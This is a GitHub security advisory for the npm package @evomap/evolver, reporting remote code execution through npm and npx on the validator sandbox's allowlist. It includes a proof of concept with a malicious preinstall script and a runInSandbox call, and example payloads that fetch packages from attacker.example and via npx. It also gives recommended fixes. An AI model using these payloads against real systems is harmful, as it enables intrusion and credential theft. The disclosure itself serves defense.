Skip to content

@evomap/evolver's validator sandbox allowlist permits `npm`/`npx`, yielding RCE from Hub-delivered validation tasks via lifecycle scripts

High severity GitHub Reviewed Published Apr 27, 2026 in EvoMap/evolver • Updated May 5, 2026

Package

npm @evomap/evolver (npm)

Affected versions

<= 1.70.0-beta.4

Patched versions

1.70.0-beta.5

Description

Summary

The validator-mode sandbox executor (src/gep/validator/sandboxExecutor.js) places npm and npx in its hard executable allowlist. Because npm install <pkg> and npx -y -p <pkg> <bin> execute arbitrary code by design (preinstall/install/postinstall lifecycle scripts and remote-package bin entries), and because validator nodes consume validation_commands strings from unsigned Hub responses with no per-response signature check, an attacker who controls or MITMs the Hub achieves automatic remote code execution on every validator node within one daemon poll (default 60s).

Details

End-to-end chain:

  1. src/gep/validator/index.js:71-87fetchValidationTasks() POSTs to <hub>/a2a/fetch and reads validation_tasks from the JSON response. The outbound request is signed via buildHubHeaders(), but the Hub's response is parsed directly with await res.json() and no signature is verified on data.payload.

  2. src/gep/validator/index.js:98-108validateOneTask() extracts task.validation_commands (an array of attacker-controlled strings) and passes it straight to runInSandbox(commands, {}). No call to policyCheck.isValidationCommandAllowed() happens on this path. The author's own comment at sandboxExecutor.js:41-42 acknowledges this gap: "This closes the gap where validation_commands go straight from Hub to runInSandbox without passing through policyCheck.isValidationCommandAllowed()."

  3. src/gep/validator/sandboxExecutor.js:172-218runSingleCommand calls parseCommand(cmd), then checks ALLOWED_EXECUTABLES.has(parsed.executable):

    // sandboxExecutor.js:35
    const ALLOWED_EXECUTABLES = new Set(['node', 'npm', 'npx']);

    parseCommand only rejects shell metacharacters (| & ; > < \ $) and unbalanced quotes. A string like npm install /tmp/evil-pkg --no-audit --no-fundcontains none of those and parses cleanly into{ executable: 'npm', args: [...] }`.

  4. sandboxExecutor.js:54-66assertNodeCommandSafe is a no-op for non-node executables:

    function assertNodeCommandSafe(parsed) {
      if (parsed.executable !== 'node') return;   // npm/npx skip every check
      ...
    }

    The BLOCKED_NODE_FLAGS set (-e, -r, --loader, etc.) therefore never gates npm or npx invocations.

  5. sandboxExecutor.js:213spawn('npm', [...], { shell: false, cwd: sandboxDir, env }) runs npm. npm's documented behavior is to execute the package's preinstall, install, and postinstall scripts; npx downloads a remote package and executes its bin entry. Both yield arbitrary code execution in the validator process's UID/permissions.

  6. src/gep/validator/index.js:189 — the validator daemon polls every 60s by default (EVOLVER_VALIDATOR_DAEMON_INTERVAL_MS), and validator mode is on by default since v1.69.0 (isValidatorEnabled() returns true unless explicitly disabled, index.js:25-34).

The "sandbox" is nominal: it sets a fresh cwd and a stripped env (HOME → tmpdir to hide ~/.npmrc/~/.ssh), but PATH is preserved (so npm/npx resolve), there is no container/chroot/seccomp/uid drop, and nothing prevents the spawned process from writing arbitrary files, opening outbound connections, or reading any file readable by the validator process.

The author's documented threat model at sandboxExecutor.js:31-34 explicitly includes Hub compromise:

"Any command whose first token is not in this set is rejected before spawn(). This prevents command injection via Hub-delivered task.command strings even if Hub itself is compromised or mis-signs a task."

Putting npm and npx on that allowlist defeats that stated goal — both are arbitrary-code-execution-by-design tools.

PoC

Reproduced against v1.70.0-beta.4 (HEAD on main):

Step 1 — plant a malicious package locally (the remote-tarball variant works identically; npm fetches and runs lifecycle scripts in both cases):

mkdir -p /tmp/evil-pkg-validator
cat > /tmp/evil-pkg-validator/package.json <<'EOF'
{
  "name":"evil-pkg-validator","version":"1.0.0",
  "scripts":{
    "preinstall":"node -e \"require('fs').writeFileSync('/tmp/pwned-by-validator-test','RCE uid='+process.getuid()+' time='+Date.now())\""
  }
}
EOF

Step 2 — invoke the exact code path used by validateOneTask() when the Hub returns a task with validation_commands: ["npm install /tmp/evil-pkg-validator --no-audit --no-fund"]:

rm -f /tmp/pwned-by-validator-test
node -e "
const s = require('./src/gep/validator/sandboxExecutor');
s.runInSandbox(
  ['npm install /tmp/evil-pkg-validator --no-audit --no-fund'],
  { cmdTimeoutMs: 60000 }
).then(o => {
  console.log('overallOk:', o.overallOk, 'exitCode:', o.results[0].exitCode);
  console.log('PWNED:', require('fs').readFileSync('/tmp/pwned-by-validator-test','utf8'));
});"

Observed output (verified):

overallOk: true exitCode: 0
PWNED: RCE uid=0 time=1777213140205

The sandbox reports overallOk: true (it sees a clean exit-0 from npm), while the preinstall script has already written /tmp/pwned-by-validator-test outside the sandbox directory — uncontained code execution as the validator UID.

Remote-only variant (no local file required): a compromised or MITM'd Hub returns:

{ "validation_commands": ["npm install https://attacker.example/evil.tgz --no-audit --no-fund"] }

or

{ "validation_commands": ["npx -y -p evil-pkg@1.0.0 evil-cmd"] }

Both pass parseCommand() (no shell metacharacters), pass ALLOWED_EXECUTABLES.has('npm'|'npx'), and assertNodeCommandSafe is a no-op for them. npm/npx fetch the remote tarball and execute its lifecycle/bin scripts on the validator host.

Impact

  • Arbitrary code execution as the evolver/validator process UID on every validator node that polls the malicious Hub (one cycle ≈ 60s by default).
  • Credential exfiltration: HUB_NODE_SECRET, A2A node identity, any cloud/cred material readable by the process.
  • Persistence / lateral movement: write to user-writable cron, systemd-user units, shell rc files; pivot into the host's container / VM.
  • Wormable across the network: a single Hub compromise auto-RCEs every node running validator mode — and validator mode is opt-out / on by default since v1.69.0.
  • Defeats the documented sandbox guarantee: the executor advertises defense against a compromised Hub; in practice, two of its three allowed binaries are arbitrary-code-execution tools.

Recommended Fix

Remove npm and npx from ALLOWED_EXECUTABLES. Validation tasks need only node <script>:

// src/gep/validator/sandboxExecutor.js
const ALLOWED_EXECUTABLES = new Set(['node']);

If npm test / npx vitest style commands must remain reachable from the Hub path, harden them explicitly:

function assertNpmCommandSafe(parsed) {
  if (parsed.executable !== 'npm' && parsed.executable !== 'npx') return;
  // Block install/exec/run-script that fetch or execute lifecycle scripts.
  const sub = parsed.args.find((a) => !a.startsWith('-'));
  const FORBIDDEN = new Set(['install', 'i', 'add', 'ci', 'exec', 'x', 'run', 'run-script', 'rebuild', 'pack', 'publish']);
  if (FORBIDDEN.has(sub)) {
    throw new Error('npm/npx subcommand not allowed in sandbox: ' + sub);
  }
  // Require --ignore-scripts on every npm invocation as defense-in-depth.
  if (parsed.executable === 'npm' && !parsed.args.includes('--ignore-scripts')) {
    throw new Error('npm in sandbox requires --ignore-scripts');
  }
  // npx always fetches+executes — disallow entirely.
  if (parsed.executable === 'npx') {
    throw new Error('npx is not allowed in sandbox');
  }
}

Additionally:

  1. Sign the Hub's /a2a/fetch response the same way outbound requests are signed (buildHubHeaders). Verify the signature on data.payload in fetchValidationTasks before handing tasks to runInSandbox. This closes the network-MITM variant that does not require Hub compromise.
  2. Run runInSandbox under real isolation — drop privileges, disable network, mount tmpfs, apply seccomp — rather than relying solely on an allowlist. The current buildSandboxEnv only redirects HOME/TMPDIR; the spawned process otherwise has full host access.
  3. Apply policyCheck.isValidationCommandAllowed() to Hub-delivered validation_commands in validateOneTask, mirroring the gate that already exists for capsule-derived commands in solidify.js / skill2gep.js.

References

@autogame-17 autogame-17 published to EvoMap/evolver Apr 27, 2026
Published to the GitHub Advisory Database May 5, 2026
Reviewed May 5, 2026
Last updated May 5, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS score

Weaknesses

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. Learn more on MITRE.

CVE ID

No known CVE

GHSA ID

GHSA-jxh8-jh77-xh6g

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.